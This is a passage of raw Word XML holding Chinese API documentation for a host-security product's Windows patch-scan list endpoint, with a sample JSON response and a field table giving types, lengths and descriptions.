      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="af6"/>
        </w:rPr>
        <w:t>基本请求方法</w:t>
      </w:r>
      <w:r w:rsidR="00000000">
        <w:rPr>
          <w:rStyle w:val="af6"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36B9B967" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E0A7017" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>/external/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>vul</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/patch/win/list</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="417AD814" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20C05A2C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "total":2,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "rows":[</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "id":"5ab243407d761b1147bfb826",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "agentId":"a3ec5aca181b179a",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "displayIp":"172.16.6.124",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "internalIp":"172.16.6.124",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>externalIp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>":null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>hostname":"servera.qingteng.cn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "group":1,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>remark":null</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>hostTags</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>":[</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                "test1",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                "test2"</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">            ],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "patchId":"QT012016000970",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>whiteRuleEffect</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>":false,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "businessImpact":0</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        },</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "id":"5ab243407d761b1147bfb827",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "agentId":"a3ec5aca181b179a",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "displayIp":"172.16.6.124",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "internalIp":"172.16.6.124",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>externalIp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>":null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>hostname":"servera.qingteng.cn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "group":1,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>remark":null</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>hostTags</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>":[</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                "test2"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            ],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "patchId":"QT012015000173",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>whiteRuleEffect</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>":false,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "businessImpact":0</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    ]</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E501AD6"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701"/>
        <w:gridCol w:w="1009"/>
        <w:gridCol w:w="1545"/>
        <w:gridCol w:w="5827"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="7456B69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22236D8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="659ED1A9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="18DE2E64" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>建议长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1EA67EAF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="0B05DCD9" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3DA6E551" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="46B82C04" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>string</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="227D7C42" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>24)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4314AB8B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>这条扫描结果的唯一标识</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="45AA4F41" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7AF63324" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>agentId</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5214E2C4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>string</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="064C4842" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>16)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="377CB14B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>主机id</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="7B821D61" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="31AF559E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>displayIp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2E74628B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>string</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="41F547A9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="79CAFE13" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>主机显示</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>ip</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="4520E25B" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="49AE0374" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>internalIp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="33C764AA" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>string</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="036D9A57" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1EC6A126" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>内网</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>ip</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="60509491" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="199895B4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>externalIp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0DB3C94D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>string</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="453E3736" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7ED8DAD8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>外网</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>ip</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="6E7EA2BE" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0E606182" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>hostname</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2289821C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>string</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="10512366" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>512)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="13C7AE83" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>主机名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="52046695" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0B3633FC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>group</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3974FFD2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5886FABF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>bigint</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>20)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4D4E5AF6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>业务组id</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="19C20138" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0DE04C75" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>remark</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="70E1CE50" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>string</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="21B4BA8A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>1024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2D651421" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>主机备注</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="29D75584" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="42B582E8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>hostTags</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="486BD5A6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6BF01333" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>1024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="741D79D2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>主机标签</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="3EA60FF6" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="44F875E8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>patchId</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0AD00DAA" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>string</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6AA8F810" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>64)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6F417EB0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>补丁id</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="420B2F65" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="03BF2B1C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>whiteRuleEffect</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="57E5835F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>boolean</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1AEDC82D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>1)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2F253912" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>是否匹配白名单</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="76D9FE42" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="422616F3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>businessImpact</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4A4B3946" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="42E119D5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>tinyint</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>4)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
